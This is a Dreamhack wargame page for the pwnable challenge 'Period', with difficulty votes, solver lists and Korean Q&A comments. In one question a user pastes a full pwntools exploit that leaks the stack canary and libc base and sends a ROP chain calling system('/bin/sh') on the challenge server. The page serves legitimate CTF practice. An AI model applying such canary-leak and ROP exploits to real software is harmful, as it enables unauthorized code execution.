학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 2
Period
pwnable
636
151
2024.08.03. 00:00:00
로그인 하고 문제 풀기
문제 정보
풀이
23
난이도 투표
36
질문
3
최근 풀이자
151
댓글
2
해당 문제는 Dreamhack CTF Season 6 Round #3 (Pwn) 에 출제된 문제입니다.
문제 설명
Description
Period, about Time or just Punctuation?
Translate
난이도 투표
36
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 8
Dyo
CTF First Place
LEVEL 5에 투표했습니다.
12일 전
ororang
대표 업적 없음
LEVEL 3에 투표했습니다.
18일 전
haehae
대표 업적 없음
LEVEL 2에 투표했습니다.
19일 전
kidz0
시스템 해킹 고인물
LEVEL 2에 투표했습니다.
24일 전
나이테
대표 업적 없음
LEVEL 3에 투표했습니다.
1개월 전
질문
3
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
힌트 부탁드립니다
canary leak까지는 했는데.. 리턴 주소를 뭘로 덮어야 할까요? NX enabled라서 쉘코드 삽입해도 안되고 system('/bin/sh')호출하려면 매개변수 세팅을 해야 하는데 rop gadget에 pop rdi도 없더라구요.. 키워드위주로 힌트 주시면 감사하겠습니다
toffeenutt
답변
2
추천
0
1년 전
질문 있습니다.[스포 주의]
카나리를 릭하는 것과, readint를 이용해서 overflow시켜 return address를 overwrite하는 것 까지는 스스로 알아냈는데 libc base를 구하는 것에 막혔었습니다. 풀이를 보니, __libc_start_main + 128의 주소가 처음 카나리 릭할 때 뒤의 여러 주소값들과 섞여있더군요. 이 __libc_start_main + 128 주소가 카나리 뒤의 여러 주소값들과 섞여있다는 걸 안다는 것은 배경지식인건가요? 아니면 gdb를 통해 충분히 알아낼 수 있었던 건가요?
Garden_
답변
1
추천
0
8개월 전
익스코드 어디가 잘못된 건지 모르겠습니다... ㅠㅠ
익스코드가 EOF가 계속 뜨는 이유를 모르겠습니다. from pwn import * r=remote("host1.dreamhack.games",19904) lib=ELF("./libc.so.6") context.log_level="debug" r.sendafter("> ",b"3.") r.sendafter("> ",b"2.") r.sendafter(".",b"a"*256) r.sendafter("> ",b"1.") r.recvn(272) canary=u64(r.recvn(8)) print(hex(canary)) r.recvn(24) lib_start=u64(r.recvn(8)) print(hex(lib_start)) lib_base=lib_start-lib.symbols['__libc_start_main']-128 sys=lib_base+lib.symbols['system'] binsh=0x1d8698+lib_base p_rdi=0x2a3e5+lib_base ret=0xbab79+lib_base pay=b'a'24+p64(canary)+b'a'8+p64(p_rdi)+p64(binsh)+p64(ret)+p64(sys) r.sendafter("> ",pay) r.send(b".") r.interactive() `
rnehgud_
답변
1
추천
0
7개월 전
«
‹
1
›
»
LEVEL 2
Period
pwnable
636
151
2024.08.03. 00:00:00
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
Dreamhack official account
First Blood!
ssongk
2024 Invitational Contenders
출제된 지
1시간
만에 풀이 완료!
최근 풀이자
151
비온데이
파이터
2일 전
whitepanmin
고목
8일 전
뀨꾸뀨뀨꾸
세계수
15일 전
tb4nch0r
사이보그
15일 전
ororang
대표 업적 없음
18일 전
jt0
대표 업적 없음
18일 전
haehae
대표 업적 없음
19일 전
kidz0
시스템 해킹 고인물
24일 전
톰크루준
대표 업적 없음
24일 전
외눈물고기
대표 업적 없음
1개월 전
«
‹
1
2
3
4
5
›
»
댓글
2
Rootsquare
바탈리온
9개월 전
ROP 연습
Translate
PinBall
시스템 해킹 전문가
11개월 전
gdb는 신이고 무적이다...!
Translate
«
‹
1
›
»
댓글 2